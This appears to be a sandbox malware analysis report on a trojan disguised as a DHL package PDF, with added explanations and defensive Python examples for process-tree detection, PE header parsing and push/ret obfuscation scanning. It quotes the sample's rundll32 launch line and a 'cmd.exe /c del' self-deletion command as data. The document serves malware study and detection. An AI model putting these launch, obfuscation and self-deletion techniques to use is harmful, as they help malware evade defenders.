 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00406943 0_2_00406943 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_0040711A 0_2_0040711A Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_100042CB 2_2_100042CB Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041D028 4_2_0041D028 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00401030 4_2_00401030 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041D8D1 4_2_0041D8D1 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041BD62 4_2_0041BD62 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00402D88 4_2_00402D88 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00402D90 4_2_00402D90 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00409E2C 4_2_00409E2C Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00409E30 4_2_00409E30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041E72D 4_2_0041E72D Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00402FB0 4_2_00402FB0 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_05010D20 4_2_05010D20 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_050E1D55 4_2_050E1D55 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_05036E30 4_2_05036E30 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0501F900 4_2_0501F900 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_050D1002 4_2_050D1002 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0502B090 4_2_0502B090 Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0504EBB0 4_2_0504EBB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0388DBD2 20_2_0388DBD2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03892B28 20_2_03892B28 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037FEBB0 20_2_037FEBB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038922AE 20_2_038922AE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037E4120 20_2_037E4120 
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037CF900 20_2_037CF900 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038920A8 20_2_038920A8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038928EC 20_2_038928EC Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03881002 20_2_03881002 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0389E824 20_2_0389E824 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037F20A0 20_2_037F20A0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037DB090 20_2_037DB090 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03891FF1 20_2_03891FF1 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037E6E30 20_2_037E6E30 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03892EF7 20_2_03892EF7 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0388D616 20_2_0388D616 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_038925DD 20_2_038925DD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037C0D20 20_2_037C0D20 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03892D07 20_2_03892D07 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037DD5E0 20_2_037DD5E0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_03891D55 20_2_03891D55 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037F2581 20_2_037F2581 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_037D841F 20_2_037D841F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0388D466 20_2_0388D466 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD2D90 20_2_00DD2D90 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD2D88 20_2_00DD2D88 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEBD62 20_2_00DEBD62 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD9E30 20_2_00DD9E30 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD9E2C 20_2_00DD9E2C Source: 
C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD2FB0 20_2_00DD2FB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEE72D 20_2_00DEE72D
 Dropped file seen in connection with other malware Show sources
 Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll 18E86106E60613594527C85FE6C97287FC8C3715181A62CB2B4D2258C210B6C8
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 037CB150 appears 35 times
 PE file contains strange resources Show sources
 Source: DHL PACKAGE - PDF.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: DHL PACKAGE - PDF.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Tries to load missing DLLs Show sources
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/22@2/2
 Contains functionality to adjust token privileges (e.g. debug / backup) Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9
 Contains functionality to check free disk space Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404686
 Contains functionality to instantiate COM classes Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar, 0_2_00402138
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
Creates temporary files
PE file has an executable .text section and no other executable section
Source: DHL PACKAGE - PDF.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads the hosts file
Runs a DLL by calling functions
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
The command line has the form rundll32.exe <dll>,<export>: the loader is asked for a module named SitulaCystocele, given without directory or extension (so it is resolved through the normal DLL search order with .dll appended), and its export Hurley is called. Both names are dictionary words rather than the name of any Windows module.
Sample is known by Antivirus
Source: DHL PACKAGE - PDF.exe Virustotal: Detection: 49%
Source: DHL PACKAGE - PDF.exe ReversingLabs: Detection: 33%
Sample reads its own file content
Spawns processes
Source: unknown Process created: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
The recorded parent/child relations are: the sample starts rundll32.exe, rundll32.exe starts two cmd.exe instances, and NETSTAT.EXE starts the cmd.exe /c del instance. The parents of autochk.exe and NETSTAT.EXE are not recorded in this section.
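The following is an added example, not part of the sandbox report: it replays the process tree above as constructed process-creation events and runs three checks an analyst would apply to it (rundll32 invoked with an unqualified DLL name, cmd.exe deleting a file under C:\Windows, and a child process of a utility that never spawns children). The pids, ppids and the parent of NETSTAT.EXE are invented for the fixture; the images and command lines are the ones the report lists, and QUIET_UTILITIES is an analyst-chosen list, not something the report states.

```python
"""Process-tree checks over constructed events modelled on the report's tree."""
import ntpath
import re

# (pid, ppid, image, command line): constructed fixture, pids are not from the report.
EVENTS = [
    (1000, 800,  r"C:\Users\user\Desktop\DHL PACKAGE - PDF.exe", r"'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe'"),
    (1100, 1000, r"C:\Windows\SysWOW64\rundll32.exe", "rundll32.exe SitulaCystocele,Hurley"),
    (1200, 1100, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe"),
    (1300, 1100, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe"),
    (1400, 1200, r"C:\Windows\SysWOW64\NETSTAT.EXE", r"C:\Windows\SysWOW64\NETSTAT.EXE"),  # parent assumed
    (1500, 1400, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Windows\SysWOW64\cmd.exe'"),
    (1600, 1500, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Utilities that have no business creating child processes (analyst-chosen, an assumption).
QUIET_UTILITIES = {"netstat.exe", "autochk.exe"}


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def rundll32_unqualified_dll(cmdline: str):
    """rundll32.exe <dll>,<export>: a DLL given without directory or extension is
    located through the loader's search order, with '.dll' appended by LoadLibrary.
    Returns (dll, export) when that is the case, else None."""
    m = re.match(r"\s*\S*rundll32(?:\.exe)?\s+([^,\s]+),(\S+)", cmdline, re.I)
    if not m:
        return None
    dll, export = m.groups()
    if "\\" in dll or "/" in dll or "." in dll:
        return None
    return dll, export


def cmd_deletes_windows_file(cmdline: str):
    """Match 'cmd.exe /c del <path>' where <path> lies under C:\\Windows."""
    m = re.search(r"/c\s+del\s+['\"]?([^'\"]+?)['\"]?\s*$", cmdline, re.I)
    if m and m.group(1).lower().startswith("c:\\windows\\"):
        return m.group(1)
    return None


def build_tree(events):
    parent = {pid: ppid for pid, ppid, _, _ in events}
    image = {pid: img for pid, _, img, _ in events}
    return parent, image


def ancestry(tree, pid):
    """Walk pid -> parent until the parent is not itself a recorded process."""
    parent, _ = tree
    chain = [pid]
    while chain[-1] in parent and parent[chain[-1]] in parent:
        chain.append(parent[chain[-1]])
    return chain


def detect(events):
    """Return (rule, pid) pairs for every event that trips one of the three checks."""
    parent, image = build_tree(events)
    hits = []
    for pid, ppid, img, cmdline in events:
        if image_name(img) == "rundll32.exe" and rundll32_unqualified_dll(cmdline):
            hits.append(("rundll32_unqualified_dll", pid))
        if image_name(img) == "cmd.exe" and cmd_deletes_windows_file(cmdline):
            hits.append(("cmd_del_windows_file", pid))
        if ppid in image and image_name(image[ppid]) in QUIET_UTILITIES:
            hits.append(("child_of_quiet_utility", pid))
    return hits


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    for rule, pid in detect(EVENTS):
        print(rule, pid, "ancestry:", ancestry(tree, pid))
```

The ancestry walk stops at the first parent that was not itself observed being created, which on the report's tree is the user-launched sample; on real telemetry that boundary is where explorer.exe or the mail client would appear.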
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Writes ini files
Checks if Microsoft Office is installed
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: DHL PACKAGE - PDF.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
These are DllCharacteristics bits of the optional header: DYNAMIC_BASE marks the image as relocatable (ASLR-compatible), NX_COMPAT as DEP-compatible, NO_SEH declares that the image contains no structured exception handlers, and TERMINAL_SERVER_AWARE is a compatibility flag. Current Microsoft linkers set DYNAMIC_BASE and NX_COMPAT by default, so this signature only says the dropper was built with recent tooling.
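The following is an added example, not part of the sandbox report or of any analysis tool: it reads the two header fields behind the signatures above, the DllCharacteristics word and the per-section Characteristics, from a PE32 image and reproduces the "only .text is executable" and "modern PE flags" checks, plus a contrast case with a writable and executable section. The image is constructed in memory as a header-only fixture (it is not the analysed sample and will not run); the section layout of the sample-like fixture is assumed from what the report states, and the PACK0/PACK1 names are invented.

```python
"""Parse DllCharacteristics and section flags from a PE32 header (constructed fixture)."""
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h)
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",           # image may be relocated (ASLR)
    0x0100: "NX_COMPAT",              # image is DEP-compatible
    0x0400: "NO_SEH",                 # image contains no SEH handlers
    0x8000: "TERMINAL_SERVER_AWARE",
}
# IMAGE_SECTION_HEADER.Characteristics bits
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000


def parse_pe(data: bytes) -> dict:
    """Return DllCharacteristics and a (name, characteristics) list for each section."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, _flags = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):           # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at +70 in both PE32 and PE32+ optional headers
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    sections, off = [], opt + opt_size
    for _ in range(nsections):                # 40-byte IMAGE_SECTION_HEADER entries
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
        off += 40
    return {"dll_characteristics": dll_chars, "sections": sections}


def decode_dll_characteristics(value: int) -> list:
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def executable_sections(info: dict) -> list:
    """Sections the loader maps executable, or that claim to contain code."""
    return [n for n, c in info["sections"] if c & (SCN_MEM_EXECUTE | SCN_CNT_CODE)]


def only_text_is_executable(info: dict) -> bool:
    return executable_sections(info) == [".text"]


def writable_executable_sections(info: dict) -> list:
    """RWX sections: usual for self-unpacking stubs, not for a plain compiler build."""
    return [n for n, c in info["sections"] if (c & SCN_MEM_EXECUTE) and (c & SCN_MEM_WRITE)]


def build_test_image(dll_chars: int, sections) -> bytes:
    """Construct a minimal header-only PE32 image (fixture, not a runnable binary)."""
    e_lfanew = 0x40
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 224                            # sizeof(IMAGE_OPTIONAL_HEADER32)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    hdrs = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", c) for n, c in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs


# Sample-like fixture: one executable section and all four reported flags (0x8540).
SAMPLE_IMAGE = build_test_image(0x8540, [
    (".text", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
    (".rdata", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
    (".data", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE),
    (".rsrc", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
])
# Contrast fixture: packer-style layout with RWX sections and no ASLR/NX flags.
PACKED_IMAGE = build_test_image(0x0000, [
    ("PACK0", SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE),
    ("PACK1", SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE),
    (".rsrc", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
])

if __name__ == "__main__":
    for label, img in (("sample-like", SAMPLE_IMAGE), ("packed", PACKED_IMAGE)):
        info = parse_pe(img)
        print(label, decode_dll_characteristics(info["dll_characteristics"]),
              "exec:", executable_sections(info), "rwx:", writable_executable_sections(info))
```

On a real file, read it with open(path, "rb").read() and pass the bytes to parse_pe; the section flags matter more than the names, since a packer can call its RWX section ".text" and still fail the writable_executable_sections check.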
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\vsa7director.pdb source: Vsa7Director.dll.0.dr
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.346057255.000000000510F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000014.00000002.506606875.00000000038BF000.00000040.00000001.sdmp
Source: Binary string: cmd.pdbUGP source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: cmd.exe, NETSTAT.EXE
Source: Binary string: Microsoft.XslDebugProxy.pdb source: nsxD96C.tmp.0.dr
Source: Binary string: PermCalc.pdb source: nsxD96C.tmp.0.dr
Source: Binary string: ActiveSyncBootstrap.pdb source: ActiveSyncBootstrap.dll.0.dr
Source: Binary string: cmd.pdb source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
wntdll.pdb, cmd.pdb and wscui.pdb are the symbol names of the legitimate WOW64 ntdll.dll, cmd.exe and wscui.cpl modules and were read from memory dumps of system processes, so they say nothing about the sample (though note that cmd.pdb is reported from NETSTAT.EXE's memory, not from cmd.exe). The entries worth attention are the dropped files (.0.dr): the vsa7director.pdb path has the f:\binaries.x86ret\... form of a Microsoft build, so Vsa7Director.dll and ActiveSyncBootstrap.dll are most plausibly genuine Microsoft DLLs carried by the dropper rather than attacker-written code.
Contains functionality to dynamically determine API calls
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_10002EED push ecx; ret 2_2_10002F00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_004178F7 pushfd ; iretd 4_2_004178FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00414D4C pushad ; iretd 4_2_00414D4D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CDE5 push eax; ret 4_2_0041CE38
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_004085A9 push esi; iretd 4_2_004085AD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE32 push eax; ret 4_2_0041CE38
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE3B push eax; ret 4_2_0041CEA2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041E6E0 push dword ptr [494A20F8h]; ret 4_2_0041E72B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041CE9C push eax; ret 4_2_0041CEA2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0041DFF3 push es; ret 4_2_0041DFFC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00416FF8 pushfd ; ret 4_2_0041709A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00416FA0 pushfd ; ret 4_2_0041709A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_0506D0D1 push ecx; ret 4_2_0506D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_0381D0D1 push ecx; ret 20_2_0381D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE78F7 pushfd ; iretd 20_2_00DE78FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEDA51 push ss; retf 20_2_00DEDA5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECDE5 push eax; ret 20_2_00DECE38
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DD85A9 push esi; iretd 20_2_00DD85AD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE4D4C pushad ; iretd 20_2_00DE4D4D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DEE6E0 push dword ptr [494A20F8h]; ret 20_2_00DEE72B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE9C push eax; ret 20_2_00DECEA2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE3B push eax; ret 20_2_00DECEA2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DECE32 push eax; ret 20_2_00DECE38
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE6FF8 pushfd ; ret 20_2_00DE709A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DE6FA0 pushfd ; ret 20_2_00DE709A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 20_2_00DED741 pushad ; iretd 20_2_00DED6F5
The cmd.exe (process 4) and NETSTAT.EXE (process 20) hits are the same instruction sequences at the same offsets from two different image bases (for example 4_2_004178F7 and 20_2_00DE78F7, 4_2_0041E6E0 and 20_2_00DEE6E0, 4_2_0506D0D1 and 20_2_0381D0D1), so they come from one code image mapped into both processes rather than from the two Windows binaries themselves. A push followed by ret (or pushfd/pushad followed by iretd) transfers control to the pushed value without a jmp or call instruction, which hides the real control flow from static disassembly and call-graph tools; such pairs also occur by chance in data and across instruction boundaries, which is why the list is long and the signature is heuristic.
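The following is an added example, not part of the sandbox report or of the sandbox's own signature engine: a linear-sweep scanner that finds the same push/ret style pairs the signature above reports, run over a constructed x86 byte string. The byte string is invented for the example; it reuses the [494A20F8h] operand from the report only so the output is recognisable, and it deliberately ends with a mov immediate that contains the bytes 56 C3 to show how a sweep over raw bytes produces false positives.

```python
"""Find push/ret, pushfd/iretd and similar pairs in raw 32-bit x86 code (constructed input)."""

# Single-byte push opcodes in 32-bit mode
PUSH_ONE = {0x50 + i: "push " + r for i, r in enumerate(["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
PUSH_ONE.update({0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
                 0x60: "pushad", 0x9C: "pushfd"})
# Return-style instructions that consume what was just pushed
RETS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def scan_push_ret(code: bytes):
    """Return (offset, text) for every push-like instruction immediately followed by a
    ret-like one. Handles one-byte pushes, push imm32 (68 xx xx xx xx) and
    push dword ptr [imm32] (FF 35 xx xx xx xx)."""
    hits = []
    n = len(code)
    for i in range(n):
        b = code[i]
        if b in PUSH_ONE:
            ln, text = 1, PUSH_ONE[b]
        elif b == 0x68 and i + 5 <= n:
            ln, text = 5, "push 0x%08X" % int.from_bytes(code[i + 1:i + 5], "little")
        elif b == 0xFF and i + 6 <= n and code[i + 1] == 0x35:
            ln, text = 6, "push dword ptr [0x%08X]" % int.from_bytes(code[i + 2:i + 6], "little")
        else:
            continue
        j = i + ln
        if j < n and code[j] in RETS:
            hits.append((i, text + "; " + RETS[code[j]]))
    return hits


# Constructed code: a normal prologue, four obfuscated transfers, an epilogue and one
# instruction whose immediate happens to contain a push/ret byte pair (56 C3).
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,                          # 0:  push ebp; mov ebp, esp
    0x83, 0xEC, 0x10,                          # 3:  sub esp, 0x10
    0x68, 0x78, 0x56, 0x34, 0x12, 0xC3,        # 6:  push 0x12345678; ret   (jump without jmp)
    0x50, 0xC3,                                # 12: push eax; ret          (jump to eax)
    0x9C, 0xCF,                                # 14: pushfd; iretd
    0xFF, 0x35, 0xF8, 0x20, 0x4A, 0x49, 0xC3,  # 16: push dword ptr [0x494A20F8]; ret
    0x5D, 0xC3,                                # 23: pop ebp; ret           (ordinary epilogue)
    0xB8, 0x56, 0xC3, 0x00, 0x00,              # 25: mov eax, 0xC356       (56 C3 inside the immediate)
])


def obfuscated_transfers(code: bytes):
    """Offsets of all reported pairs; the caller must still confirm each is on an
    instruction boundary, which a linear byte sweep cannot know."""
    return [off for off, _ in scan_push_ret(code)]


if __name__ == "__main__":
    for off, text in scan_push_ret(SAMPLE_CODE):
        print("%4d  %s" % (off, text))
```

The hit at offset 26 sits inside the mov immediate, not on an instruction boundary; a sandbox that reports hundreds of such pairs across a process is counting the same kind of noise, so treat the count as a hint to look at the disassembly rather than as proof of obfuscation.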
Drops PE files